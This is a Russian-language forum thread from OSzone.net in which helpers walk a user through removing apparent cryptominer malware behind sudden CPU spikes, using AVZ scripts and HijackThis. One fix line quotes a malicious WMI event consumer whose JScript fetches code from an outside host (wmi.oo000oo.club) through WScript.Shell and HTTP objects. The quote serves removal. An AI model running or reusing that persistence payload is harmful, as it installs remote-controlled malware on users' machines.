Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Резко нагружается ЦП. Запуск диспетчера задач избавляет от проблемы на время. (http://forum.oszone.net/showthread.php?t=332084)

RyuSick 24-12-2017 08:38 2786487
Резко нагружается ЦП. Запуск диспетчера задач избавляет от проблемы на время.
 
При запуске ПК работает в рабочем режиме. Через некоторое время ЦП нагружается на ~70%. Запуск диспетчера задач приводит все в норму, но на небольшое время. Прошу помощи.

iskander-k 24-12-2017 10:09 2786494
Выложите логи по правилам. http://forum.oszone.net/thread-98169.html

RyuSick 05-01-2018 12:36 2789059
Вложений: 1
ВотФайл 150396

RyuSick 07-01-2018 18:42 2789591
iskander-k, еще что-то нужно?

Sandor 08-01-2018 10:45 2789684
Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('C:\Windows\help\lsmosee.exe','');
 DeleteFile('C:\Windows\help\lsmosee.exe','32');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
Компьютер перезагрузится.



Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis:
Код:
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.oo000oo.club:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");(1733 bytes)
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
Прикрепите свежий CollectionLog.

Sandor 08-01-2018 17:25 2789775
Дополнительно:
Выполните скрипт в AVZ (Файл - Выполнить скрипт):

Код:
begin
ExpRegKey('HKLM','SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy','IPSec.reg');
end.
Файл IPSec.reg в папке с AVZ упакуйте в архив и прикрепите к сообщению.

RyuSick 08-01-2018 18:34 2789791
Вложений: 1
Вот Файл 150464

RyuSick 08-01-2018 18:35 2789792
Все остальное выполнено

Sandor 09-01-2018 09:25 2789918
Цитата:
Цитата Sandor
Файл IPSec.reg в папке с AVZ упакуйте в архив и прикрепите к сообщению »
Еще это не сделали.

RyuSick 09-01-2018 14:00 2789963
Вложений: 1
Файл 150482

Sandor 09-01-2018 14:20 2789968
Что сейчас с проблемой?


Время: 20:07.

Время: 20:07.
© OSzone.net 2001-